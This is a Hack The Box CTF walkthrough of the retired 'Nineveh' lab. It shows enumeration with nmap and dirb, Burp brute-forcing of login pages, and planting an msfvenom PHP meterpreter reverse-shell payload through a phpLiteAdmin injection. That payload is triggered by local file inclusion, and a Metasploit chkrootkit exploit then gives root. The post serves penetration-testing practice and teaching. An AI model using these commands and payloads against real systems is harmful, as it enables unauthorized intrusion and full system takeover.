E Exploits

Hack The Box : Nineveh Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Nineveh” which is categories as retired lab presented by Hack the Box for making online penetration practices. 

Level: Intermidate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Nineveh is 10.10.10.43 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10.43

it enumerated port 80 and 443 are open.

image

We explored port 80 but didn’t observe any remarkable clue for next step.

image

So next, we use the dirb tool of kali to enumerate the directories and found some important directories such as http://10.10.10.43/department/  then went to the web browser to explore them.

dirb http://10.10.10.43 /usr/share/wordlist/dirb/big.txt

image

It put-up login page as shown here.

image

So we try the random combination of username and password. While we have enter username: admin and Password: password it gave an error “Invalid Password” hence it was sure that the username must be admin.

image

Then with help of burp suit we made brute force attack and use rockyou.txt file as password dictionary. Thus we obtain correct combination for login.

Username: admin
Password: 1q2w3e4r5t

image

 

Used above credential for login and get into admin console as shown.

image

At Notes tab we concluded that the given text of a file stored at someplace in the system entitled with ninevehNotes.txt.

image

After that we also we explored port 443 and observe the following web page. We also look at it view source but didn’t notice any further hint.

image

Therefore again use dirb tool for directory brute force attack and observe the /db directory.

dirb https://10.10.10.43 /usr/share/wordlist/dirb/big.txt

image

For a second time we explored above enumerated directory and observe login page for phplightAdmin v1.9.

image

Again we lunch brute forced the password field on /db with burp suit and got the password: password123.

image

By using password123 and we get inside the PHP LiteAdmin dashboard. Then with help of Google we found the trick to exploit it after reading description from exploit DB 24044.

image

After reading the description from exploit 24044 then we create a new database “ninevehNotes.txt.shell.php”

image

Here we have created a new table “Demo” and Add! Filed inside this.

image

Now create entry in filed 1 as shown.

image

Let’s create a PHP payload for injecting inside new database. We have use msfvenom command for generating PHP backdoor.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw

Now copy the code from *<?php….die(); and start multi handler in a new terminal

image

GO to insert tab and Past above copied code inside the text filed given for Value.

image

At last you will notice /var/tmp/ ninevehNotes.txt.shell.php is the Path for your database.

image

If you remember, we had already access admin console and observed a tab for Notes, use it to execute your backdoor.

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.shell.php

image

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.25
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation.

meterpreter > sysinfo
meterpreter > cd /home
meterpreter > ls
meterpreter > cd amrois
meterpreter >ls
meterpreter > cat user.txt

image

After doing a little bit enumeration we notice a directory report is owned by the user amrois and these reports were being continuously generated by chkrootkit in every minute.

With help of Google we came know that metasploit contains an exploit for chkrootkit exploitation. After enter following command as shown in given image to load exploit/unix/local/chkrootkit module then set session 1and arbitrary lport such as 4545 and run the module.

This will give another session, as you can see we have spawned command shell of target’s machine. Now if you will check uid by typing id it will show uid=0 as root.

id
cd /root

And to see the list of files in /root type:

ls -lsa

In the list you will see that there is a text file and to read that file type :

cat root.txt

Congrats!! We hit Goal finished both task and at end obtain the root access.

image

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack The Box : Nineveh Walkthrough appeared first on Hacking Articles.

Read more